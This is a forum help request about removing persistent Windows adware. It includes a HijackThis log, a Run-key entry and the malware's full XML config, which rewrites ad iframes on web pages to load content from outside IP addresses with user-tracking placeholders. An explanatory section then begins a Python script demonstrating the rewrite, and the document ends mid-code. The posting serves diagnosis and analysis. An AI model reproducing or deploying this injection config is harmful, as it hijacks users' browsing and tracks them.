Help me remove persistent malware

Hi

I have a problem with a PC in that some malware seems to get half removed by McAfee, which leaves web pages incompletely loaded. OK, I have solved that by using Opera, BUT I cannot get rid of this pest. I use McAfee, SpyHunter, Uniblue SpyEraser and RogueRemover Pro; nothing will shift this.

It starts with an XML page that regenerates itself when removed (see the end of this question for the content). This appears in the HKLM Run section, to run Rundll32.exe (from the system32 directory via prefetching commands). This in turn runs a DLL, which is in the system32 directory. This malware even logs on as another user (I have since changed the log-on to a guest account with password control to try and prevent this).

Here is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:26:24, on 27-01-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Programmer\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Programmer\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Programmer\SiteAdvisor\6253\SAService.exe
C:\WINDOWS\system32\svchost.exe
C:\Programmer\McAfee\MSK\MskAgent.exe
C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
C:\WINDOWS\StartupMonitor.exe
C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
C:\Programmer\McAfee\MPS\mpsevh.exe
C:\Programmer\HP\Digital Imaging\bin\hpqimzone.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\alg.exe
C:\Programmer\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Programmer\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Documents and Settings\Anne\Skrivebord\Startup.exe
C:\WINDOWS\system32\HPZinw12.exe
C:\WINDOWS\regedit.exe
C:\Documents and Settings\Anne\Skrivebord\HiJackThis.exe
C:\PROGRAM FILES\PROCESS EXPLORER\PROCEXP.EXE
C:\WINDOWS\explorer.exe
C:\Programmer\Opera\Opera.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://dellsearchedit.myway.com/samisc/dellsidebar.jhtml?p=DJ
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.epilepsiforeningen.dk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Programmer\SiteAdvisor\6253\SiteAdv.dll
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETVÆRKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Hurtig start.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Send til &Bluetooth-enhed... - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: FirstClass® - {02011FE3-C22B-451d-9A25-BF4DBB38B8E7} - C:\WINDOWS\Downloaded Program Files\fcplugin.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {11818680-FCF6-11D0-9808-0800092A4865} (Adobe Form Control) - http://www.kps.dk/Codebase/FormCtl.cab
O16 - DPF: {1469FF24-47F6-11D2-8805-006008C537E3} (Adobe Mail Control) - http://www.kps.dk/codebase/ffmail.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201280089546
O16 - DPF: {9C196458-4145-46AF-8A77-1506878DFECA} (FirstClass® Control) - ftp://ftp.sektornet.dk/sektornet/skolekom/fcplugin.cab
O16 - DPF: {CDDCFBB3-4D93-11D2-B1A9-00A0C9B742BE} (Adobe Script Object) - http://www.kps.dk/codebase/scriptobject.cab
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey) - https://netbank.danskebank.dk/html/activex/e-Safekey/DB/e-Safekey.cab
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programmer\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\FÆLLES~1\McAfee\EmProxy\emproxy.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmer\Fælles filer\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programmer\iPod\bin\iPodService.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Programmer\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Programmer\McAfee\MSK\MskSrver.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Programmer\Intel\PROSetWired\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SiteAdvisor-tjeneste (SiteAdvisor Service) - Unknown owner - C:\Programmer\SiteAdvisor\6253\SAService.exe

--
End of file - 8833 bytes


(See the HKLM entry for BM870dc8a8)

BM870dc8a8 is this:

<ROOT><CAMPAIGNLIST><CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x600" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a57232fb' name='a57232fb' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='600'><a href='http://85.12.43.83/www/delivery/ck.php?n=a2d7629e' target='_blank'><img 
src='http://85.12.43.83/www/delivery/avw.php?zoneid=36&n=a2d7629e' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8c6b7cd' name='a8c6b7cd' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a0118327' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=37&n=a0118327' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="125x125" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=125x125;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a6ea2661' name='a6ea2661' 
src='http://85.17.166.173/go/?cmp=nm_bm3s_125x125&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='125' height='125'><a href='http://85.12.43.83/www/delivery/ck.php?n=afe4b666' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=38&n=afe4b666' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="180x150" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=180x150;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" 
weight="100"><![CDATA[<iframe id='aa44b86f' name='aa44b86f' src='http://85.17.166.173/go/?cmp=nm_bm3s_180x150&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='180' height='150'><a href='http://85.12.43.83/www/delivery/ck.php?n=a935a5aa' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=39&n=a935a5aa' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="234x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=234x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a80f0628' name='a80f0628' src='http://85.17.166.173/go/?cmp=nm_bm3s_234x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='234' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=a61ab872' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=40&n=a61ab872' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="240x400" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action 
name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=240x400;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a4da5d34' name='a4da5d34' src='http://85.17.166.173/go/?cmp=nm_bm3s_240x400&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='240' height='400'><a href='http://85.12.43.83/www/delivery/ck.php?n=a424da19' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=41&n=a424da19' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="250x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=250x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ad90e55d' name='ad90e55d' src='http://85.17.166.173/go/?cmp=nm_bm3s_250x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='250' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=ac032ecf' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=42&n=ac032ecf' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time 
value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x100" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x100;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1111aad' name='a1111aad' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x100&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='100'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8b2301d' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=43&n=a8b2301d' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa619a73' target='_blank'><img 
src='http://85.12.43.83/www/delivery/avw.php?zoneid=44&n=aa619a73' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="336x280" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=336x280;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1e38bd4' name='a1e38bd4' src='http://85.17.166.173/go/?cmp=nm_bm3s_336x280&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='336' height='280'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa2664b8' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=45&n=aa2664b8' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="468x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=468x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a24b320b' name='a24b320b' 
src='http://85.17.166.173/go/?cmp=nm_bm3s_468x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa173903' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=46&n=aa173903' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="720x300" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=720x300;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aaf81f87' name='aaf81f87' src='http://85.17.166.173/go/?cmp=nm_bm3s_720x300&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='720' height='300'><a href='http://85.12.43.83/www/delivery/ck.php?n=afb3d0f9' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=47&n=afb3d0f9' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="728x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action 
name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=728x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aff78e03' name='aff78e03' src='http://85.17.166.173/go/?cmp=nm_bm3s_728x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN></CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>

Has anyone got ANY idea how to remove the mechanism that regenerates this pest? The IP address resolves to Breda in Holland.
steve0412 Asked:
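The rewrite that the posted BM870dc8a8 config describes can be reproduced directly from the XML: each <CAMPAIGN> carries two regexes that match an <IFRAME> ad slot of one size (either by its WIDTH/HEIGHT attributes or by a `;sz=WxH;` token in the src URL), a replacement iframe pointing at 85.17.166.173 with [uid]/[guid]/[aid]/[url] placeholders, and a `count` option capping how many slots get swapped. The Python below is an added example, not code from the question or from the malware itself. It embeds the 300x250 campaign and the COOKIES block copied from the config above, applies the campaign to a constructed page (the ads.example.test and example.test hosts, the ord= values and the zero placeholder values are invented), and decodes the cookies, which turn out to be base64 with a trailing # standing in for the = padding.

```python
import base64
import re
import xml.etree.ElementTree as ET

# One campaign copied from the BM870dc8a8 config posted in the question (the
# 300x250 slot, inner <a>/<img> fallback trimmed) plus its COOKIES block. The
# real file repeats the same CAMPAIGN element for a dozen other ad sizes.
CAMPAIGN_XML = r"""<ROOT><CAMPAIGNLIST>
<CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options>
<commands><command name="code_modify"><actions><action name="replace"><initial_values>
<initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value>
<initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value>
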